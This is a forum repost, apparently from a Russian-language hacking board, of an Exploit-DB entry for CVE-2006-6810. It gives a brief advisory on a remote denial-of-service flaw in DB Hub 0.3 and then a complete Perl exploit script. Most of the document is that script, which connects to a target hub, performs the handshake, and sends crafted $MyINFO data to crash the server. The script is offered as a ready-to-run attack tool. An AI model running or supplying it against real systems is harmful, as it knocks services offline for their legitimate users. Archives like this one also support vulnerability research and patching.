Exploit DB Hub 0.3 - Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29362
Проверка EDB
  1. Пройдено
Автор
CRITICAL SECURITY
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2006-6810
Дата публикации
2006-12-27
DB Hub 0.3 - Remote Denial of Service
Код:
source: https://www.securityfocus.com/bid/21791/info

A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic.

An attacker may exploit this issue to crash affected applications, denying service to legitimate users.

DB Hub version 0.3 is vulnerable to this issue; other versions may also be affected.

#!/usr/bin/perl
# DB Hub (http://dbhub.ir.pl/) DoS exploit 
# Critical Security (http://www.critical.lt)

use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];

print q( 
----------------------------------------------
|  DB Hub (http://dbhub.ir.pl/) DoS exploit  |
----------------------------------------------
);

if (@ARGV < 3) { 
  print "Usage: perl crit_dbhub.pl host port nick\n";
  exit();
}

if ($connect = IO::Socket::INET->new(PeerAddr => $host, 
                                     PeerPort => $port, 
                                     Proto => tcp,
                                     Timeout => 5 ) 
   or die "[-] Can't connect\n") 
    { 
     print "[+] Connected!\n";
    }

$res = $connect->recv($text,200);
if ($text = ~/Lock/) { $connect->send("\$Key vistiek_netikrina|\$ValidateNick $nick|"); }
$connect->send("\$Version 20|\$MyINFO \$ALL $nick  <++ V:0.674,M:A,H:1/0/0,S:11>\$ \$DSL.\$\$19313847685\$|\$GetNickList|");
$connect->send("<$nick>!|"); # xixi
print "[+] Data sent\n"; 
while($text) { $res = $connect->recv($text,200); }
print "[+] Done\n";
 
Источник
www.exploit-db.com

Похожие темы